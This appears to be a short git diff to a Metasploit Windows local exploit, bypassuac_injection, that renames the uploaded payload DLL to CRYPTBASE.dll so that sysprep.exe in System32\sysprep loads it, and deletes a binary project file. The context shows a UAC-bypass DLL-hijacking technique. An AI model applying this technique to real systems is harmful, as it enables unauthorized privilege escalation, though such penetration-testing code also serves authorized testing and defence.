diff --git a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp index b67802e045..975b8e4b61 100644 --- a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp +++ b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp @@ -5,7 +5,7 @@ void exploit() const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep"; const wchar_t *szElevDll = L"CRYPTBASE.dll"; const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll"; - const wchar_t *szSourceDll = L"payload.dll"; // Need some IPC to randomize this if possible + const wchar_t *szSourceDll = L"CRYPTBASE.dll"; // Need some IPC to randomize this if possible const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe"; const wchar_t *szElevArgs = L""; wchar_t path[MAX_PATH]; diff --git a/external/source/exploits/bypassuac_injection/rdi.sdf b/external/source/exploits/bypassuac_injection/rdi.sdf deleted file mode 100644 index 43eab46a7e..0000000000 Binary files a/external/source/exploits/bypassuac_injection/rdi.sdf and /dev/null differ diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index eaa9ed951c..28646540a2 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Local payload = generate_payload_dll - payload_filepath = "#{tmpdir}\\payload.dll" + payload_filepath = "#{tmpdir}\\CRYPTBASE.dll" print_status("Uploading the Payload DLL to the filesystem...")